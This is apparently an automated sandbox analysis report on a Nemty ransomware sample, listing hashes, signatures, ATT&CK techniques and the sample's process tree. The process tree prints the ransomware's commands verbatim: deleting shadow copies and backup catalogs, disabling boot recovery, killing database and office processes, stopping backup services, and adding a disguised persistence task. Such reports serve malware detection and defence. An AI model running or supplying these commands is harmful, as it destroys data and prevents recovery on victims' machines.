Analysis

  • max time kernel
    78s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    26-07-2021 12:41

General

  • Target

    a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe

  • Size

    207KB

  • MD5

    ae24eb430be3d0598b7510bba484f580

  • SHA1

    9b6a75b930e8ea41578ec0a6d3df2259a6990d1d

  • SHA256

    a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07

  • SHA512

    ca5ec7ca780642bc0105a84c7f4eea60b826d36429ecdceb2a9bb27f2ce688909a6953d18bd9884b19a36604a8c170876c6997c743ca3dbe44ecdfd4a142042a

Malware Config

Signatures

  • Nemty

    Ransomware discovered in late 2019 which has been actively developed/updated over time.

  • suricata: ET MALWARE Win32/Nemty Ransomware Style Geo IP Check M1
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 59 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\a2f6c36cb8f46207028fbd3f3b69e306d3bdc4fc0391cfda5609812df880be07.sample.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4084
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
        3⤵
        • Interacts with shadow copies
        PID:3692
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
        3⤵
        • Interacts with shadow copies
        PID:1208
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.*
      2⤵
        PID:1776
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im sql.*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4696
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.*
        2⤵
          PID:1756
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im winword.*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4780
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im thunderbird.*
          2⤵
            PID:4012
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im thunderbird.*
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4828
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c taskkill /f /im outlook.*
            2⤵
              PID:2096
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im outlook.*
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4916
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /f /im wordpad.*
              2⤵
                PID:2668
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im wordpad.*
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4792
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /f /im oracle.*
                2⤵
                  PID:1312
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im oracle.*
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5000
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.*
                  2⤵
                    PID:2596
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im excel.*
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4992
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /f /im onenote.*
                    2⤵
                      PID:1524
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im onenote.*
                        3⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5092
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /f /im node.*
                      2⤵
                        PID:3680
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im node.*
                          3⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4884
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /f /im QBW32.*
                        2⤵
                          PID:2644
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im QBW32.*
                            3⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4384
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /f /im virtualboxvm.*
                          2⤵
                            PID:3872
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im virtualboxvm.*
                              3⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4304
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c taskkill /f /im WBGX.*
                            2⤵
                              PID:1828
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im WBGX.*
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4824
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /f /im Teams.*
                              2⤵
                                PID:1336
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /f /im Teams.*
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5072
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /f /im Flow.*
                                2⤵
                                  PID:1872
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im Flow.*
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5144
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c net stop DbxSvc
                                  2⤵
                                    PID:4132
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop DbxSvc
                                      3⤵
                                        PID:5220
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop DbxSvc
                                          4⤵
                                            PID:5428
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c net stop OracleXETNSListener
                                        2⤵
                                          PID:4168
                                          • C:\Windows\SysWOW64\net.exe
                                            net stop OracleXETNSListener
                                            3⤵
                                              PID:5228
                                              • C:\Windows\SysWOW64\net1.exe
                                                C:\Windows\system32\net1 stop OracleXETNSListener
                                                4⤵
                                                  PID:5372
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c net stop AcrSch2Svc
                                              2⤵
                                                PID:4276
                                                • C:\Windows\SysWOW64\net.exe
                                                  net stop AcrSch2Svc
                                                  3⤵
                                                    PID:5248
                                                    • C:\Windows\SysWOW64\net1.exe
                                                      C:\Windows\system32\net1 stop AcrSch2Svc
                                                      4⤵
                                                        PID:5480
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c net stop OracleServiceXE
                                                    2⤵
                                                      PID:4236
                                                      • C:\Windows\SysWOW64\net.exe
                                                        net stop OracleServiceXE
                                                        3⤵
                                                          PID:5184
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 stop OracleServiceXE
                                                            4⤵
                                                              PID:5444
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c net stop AcronisAgent
                                                          2⤵
                                                            PID:4312
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net stop AcronisAgent
                                                              3⤵
                                                                PID:5160
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 stop AcronisAgent
                                                                  4⤵
                                                                    PID:5300
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c net stop Apache2.4
                                                                2⤵
                                                                  PID:4352
                                                                  • C:\Windows\SysWOW64\net.exe
                                                                    net stop Apache2.4
                                                                    3⤵
                                                                      PID:5280
                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                        C:\Windows\system32\net1 stop Apache2.4
                                                                        4⤵
                                                                          PID:5472
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c net stop SQLWriter
                                                                      2⤵
                                                                        PID:4388
                                                                        • C:\Windows\SysWOW64\net.exe
                                                                          net stop SQLWriter
                                                                          3⤵
                                                                            PID:5392
                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                              C:\Windows\system32\net1 stop SQLWriter
                                                                              4⤵
                                                                                PID:5536
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c net stop MSSQL$SQLEXPRESS
                                                                            2⤵
                                                                              PID:4432
                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                net stop MSSQL$SQLEXPRESS
                                                                                3⤵
                                                                                  PID:5328
                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                    C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
                                                                                    4⤵
                                                                                      PID:5592
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c net stop MSSQLServerADHelper100
                                                                                  2⤵
                                                                                    PID:4476
                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                      net stop MSSQLServerADHelper100
                                                                                      3⤵
                                                                                        PID:5416
                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                          C:\Windows\system32\net1 stop MSSQLServerADHelper100
                                                                                          4⤵
                                                                                            PID:5696
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c net stop MongoDB
                                                                                        2⤵
                                                                                          PID:4520
                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                            net stop MongoDB
                                                                                            3⤵
                                                                                              PID:5500
                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                C:\Windows\system32\net1 stop MongoDB
                                                                                                4⤵
                                                                                                  PID:5728
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c net stop SQLAgent$SQLEXPRESS
                                                                                              2⤵
                                                                                                PID:4588
                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                  net stop SQLAgent$SQLEXPRESS
                                                                                                  3⤵
                                                                                                    PID:5528
                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
                                                                                                      4⤵
                                                                                                        PID:5708
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c net stop SQLBrowser
                                                                                                    2⤵
                                                                                                      PID:4632
                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                        net stop SQLBrowser
                                                                                                        3⤵
                                                                                                          PID:5544
                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                            C:\Windows\system32\net1 stop SQLBrowser
                                                                                                            4⤵
                                                                                                              PID:5768
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c net stop cbVSCService11
                                                                                                          2⤵
                                                                                                            PID:4728
                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                              net stop cbVSCService11
                                                                                                              3⤵
                                                                                                                PID:5640
                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                  C:\Windows\system32\net1 stop cbVSCService11
                                                                                                                  4⤵
                                                                                                                    PID:5756
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c net stop QBVSS
                                                                                                                2⤵
                                                                                                                  PID:4840
                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                    net stop QBVSS
                                                                                                                    3⤵
                                                                                                                      PID:5516
                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                        C:\Windows\system32\net1 stop QBVSS
                                                                                                                        4⤵
                                                                                                                          PID:5580
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c net stop QBCFMontorService
                                                                                                                      2⤵
                                                                                                                        PID:4768
                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                          net stop QBCFMontorService
                                                                                                                          3⤵
                                                                                                                            PID:5436
                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                              C:\Windows\system32\net1 stop QBCFMontorService
                                                                                                                              4⤵
                                                                                                                                PID:5628
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c net stop
                                                                                                                            2⤵
                                                                                                                              PID:4876
                                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                                net stop
                                                                                                                                3⤵
                                                                                                                                  PID:5748
                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                    C:\Windows\system32\net1 stop
                                                                                                                                    4⤵
                                                                                                                                      PID:5828
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c net stop CobianBackup11
                                                                                                                                  2⤵
                                                                                                                                    PID:4684
                                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                                      net stop CobianBackup11
                                                                                                                                      3⤵
                                                                                                                                        PID:5608
                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                          C:\Windows\system32\net1 stop CobianBackup11
                                                                                                                                          4⤵
                                                                                                                                            PID:5740
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c net stop
                                                                                                                                        2⤵
                                                                                                                                          PID:4948
                                                                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                                                                            net stop
                                                                                                                                            3⤵
                                                                                                                                              PID:5792
                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                C:\Windows\system32\net1 stop
                                                                                                                                                4⤵
                                                                                                                                                  PID:5912
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c net stop
                                                                                                                                              2⤵
                                                                                                                                                PID:3888
                                                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                                                  net stop
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5884
                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                      C:\Windows\system32\net1 stop
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5960
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c net stop
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5064
                                                                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                                                                        net stop
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5848
                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                            C:\Windows\system32\net1 stop
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5924
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c net stop
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5200
                                                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                                                              net stop
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5972
                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                  C:\Windows\system32\net1 stop
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:6004
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c net stop
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5864
                                                                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                    net stop
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6040
                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                        C:\Windows\system32\net1 stop
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:6084
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks.exe /create /sc onstart /tn "NEMTY_O85YRFZ" /tr "C:\Users\Admin\AdobeUpdate.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:6032
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks.exe /create /sc onstart /tn "NEMTY_O85YRFZ" /tr "C:\Users\Admin\AdobeUpdate.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:6116
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4924
                                                                                                                                                                          • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                            vssadmin.exe delete shadows /all /quiet
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                            PID:5372
                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                            wmic shadowcopy delete
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:5228
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\NEMTY_O85YRFZ-DECRYPT.txt"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                          PID:5612
                                                                                                                                                                          • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                                                                                                                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\NEMTY_O85YRFZ-DECRYPT.txt
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4212
                                                                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:4016

                                                                                                                                                                        Network

                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                        Execution

                                                                                                                                                                        Scheduled Task

                                                                                                                                                                        1
                                                                                                                                                                        T1053

                                                                                                                                                                        Persistence

                                                                                                                                                                        Scheduled Task

                                                                                                                                                                        1
                                                                                                                                                                        T1053

                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                        Scheduled Task

                                                                                                                                                                        1
                                                                                                                                                                        T1053

                                                                                                                                                                        Defense Evasion

                                                                                                                                                                        File Deletion

                                                                                                                                                                        2
                                                                                                                                                                        T1107

                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                        1
                                                                                                                                                                        T1130

                                                                                                                                                                        Modify Registry

                                                                                                                                                                        1
                                                                                                                                                                        T1112

                                                                                                                                                                        Discovery

                                                                                                                                                                        System Information Discovery

                                                                                                                                                                        1
                                                                                                                                                                        T1082

                                                                                                                                                                        Command and Control

                                                                                                                                                                        Web Service

                                                                                                                                                                        1
                                                                                                                                                                        T1102

                                                                                                                                                                        Impact

                                                                                                                                                                        Inhibit System Recovery

                                                                                                                                                                        2
                                                                                                                                                                        T1490

                                                                                                                                                                        Replay Monitor

                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                        Downloads

                                                                                                                                                                        • C:\Users\Admin\NEMTY_O85YRFZ-DECRYPT.txt
                                                                                                                                                                          MD5

                                                                                                                                                                          5a6559091bbc265f02a0a6a278097d6a

                                                                                                                                                                          SHA1

                                                                                                                                                                          ead7e4671ada9d7d72aeba9dfc5506f83a89d715

                                                                                                                                                                          SHA256

                                                                                                                                                                          4dbc1444d9bf7790afee764262d108077310233d44524f0c32f639dc44ed79f5

                                                                                                                                                                          SHA512

                                                                                                                                                                          e18681f20cb798ff19e847eb3d4d2ea0ba4e3896b009d0ceb3f682eae6401d9d5bf47919fedf3628f05a77810fc17f646886533ac3c049f9bc514cf59553ef9d

                                                                                                                                                                        • memory/1208-119-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/1312-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/1336-132-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/1524-127-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/1756-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/1776-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/1828-131-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/1872-133-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/2032-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/2096-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/2596-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/2644-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/2668-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/2932-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/3680-129-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/3692-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/3872-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/3888-161-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4012-124-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4084-114-0x0000000000610000-0x0000000000628000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          96KB

                                                                                                                                                                        • memory/4084-115-0x0000000000400000-0x0000000000522000-memory.dmp
                                                                                                                                                                          Filesize

                                                                                                                                                                          1.1MB

                                                                                                                                                                        • memory/4132-134-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4168-135-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4236-136-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4276-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4304-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4312-138-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4352-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4384-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4388-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4432-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4476-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4520-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4588-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4632-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4684-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4696-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4728-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4768-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4780-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4792-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4824-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4828-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4840-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4876-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4884-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4916-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4948-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/4992-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5000-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5064-159-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5072-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5092-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5144-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5160-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5184-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5200-170-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5220-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5228-171-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5248-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5280-174-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5300-175-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5328-176-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5372-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5392-178-0x0000000000000000-mapping.dmp
                                                                                                                                                                        • memory/5416-179-0x0000000000000000-mapping.dmp